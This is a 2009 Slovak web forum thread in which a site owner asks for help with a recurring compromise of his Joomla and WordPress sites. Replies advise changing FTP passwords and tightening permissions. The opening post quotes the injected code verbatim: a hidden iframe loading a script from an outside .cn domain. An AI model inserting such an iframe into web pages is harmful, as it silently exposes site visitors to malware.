Dobrý Deň, Hosť
Meno:  Heslo: Zapamätať  Obnoviť heslo | Registrovať
Štvrtok, 24. Máj 2012 02:16

hacknuta stranka
Vitajte, Hosť. Prosím prihláste sa alebo sa zaregistrujte.

Prihláste sa užívateľským menom, heslom a dĺžkou sedenia

Pokročilé vyhľadávanie

24394 príspevkov v 4753 tém- od 64463 užívateľov - Najnovší užívateľ: Raiper34

Štvrtok, 24. Máj 2012 02:16
Strán: [1]
Tlačiť
Autor Téma: hacknuta stranka  (Prečítané 2115 krát)
0 užívateľov a 1 Hosť prehliada túto tému.
KBR
Jr. Member
**

Pohlavie: Mužské
Príspevkov: 77

« kedy: Pondelok, 19. Január 2009 16:53 »

ahojte. viem ze hacknutych stranok je hockolko a aj rieseni ako zabezpecit stranku ale mam taky problem co sa uz snazim dlhsie vyriesit a nedari sa mi.

robil som na jednej subdomene stranku v joomle a na inej vo wordpress. zhruba pred 1-2 mesiacmi mi to nejaky chytrak hackol. vsetko co spravi je ze do vsetkych php suborov natlaci toto:

Kód:
<div style="visibility:hidden"><iframe src="http://directlinke.cn/in.cgi?27" width=100 height=80></iframe></div>

a potom stranka nefunguje alebo funguje ale niektory antivir hlasi ze je virus na stranke. ale ze do vsetkych suborov, nie len tych co su v roote. tak som sa s tym zabaval. bolo toho tolko ze som radsej vsetko zmazal a dal tam nove subory. a nasledujuci den to iste. neni to clovek ale nejaky script, lebo meni vsetky subory naraz. a nejde pravdepodobne o dieru v joomle lebo to robi aj pre wordpress alebo aj pre hocijaky iny system resp. subory.

viem ho zastavit len tak ze nastavim prava suborov tak ze sa ani stranka nezobrazi co je neakceptovatelne. inak sa tam nejakym zazrakom vzdy dostane. nezastavi ho ani zaheslovanie cez .htpassword lebo to asi robi cez ftp.

na tento konkretny problem som nasiel diskusiu iba na nejakej greckej stranke ale tam toho vela nevyriesili preto prosim ak by niekto vedel pomoct tu.

dakujem
Zaznamenané
_michal
Newbie
*

Príspevkov: 1

« Odpoveď #1 kedy: Pondelok, 19. Január 2009 20:21 »

Ahoj

dnes sa kradne vsetko, ftp hesla niesu vynimkou. Zmen ho z bezpecneho pocitaca/poziadaj o zmenu, nikdy neukladat heslo a odstranit spyware. Riziko su vsetky otvorene kanale, vratane vnc a pod. 
Zaznamenané
EMERICH
Jr. Member
**

Príspevkov: 84

MERINEO

« Odpoveď #2 kedy: Pondelok, 26. Január 2009 15:21 »

presne tak, treba poriadne nastavit CHMODy vsade a zmenit FTP heslo na poriadne zlozitejsie, nech sa s tym zabavaju aspon trochu, radsej ich to potom omrzi a pojdu inde...Smiley
Zaznamenané
KBR
Jr. Member
**

Príspevkov: 77

« Odpoveď #3 kedy: Piatok, 30. Január 2009 10:51 »

dakujem vam za rady.

heslo sa mi videlo dost zlozite ale som ho zmenil na hadam poriadne a odstranil som ten skodlivy kod dufam ze zo vsadial. som uplne vsetky subory pre istotu prepisal.

uvidim cez vikend ci to bude nazad alebo to bude ok. ale uz sa asi toho blbeho pocity nikdy nezbavim.

mam este jednu otazku. som pri kupovani hostingu zabudol napisat aby vypli safemode. moze to mat nieco spolocne s tym? lebo na ostatne stranky kde som daval joomlu sa mi zatial nikto nenabural.

diky este raz

Zaznamenané
Strán: [1]
Tlačiť
Prejsť na: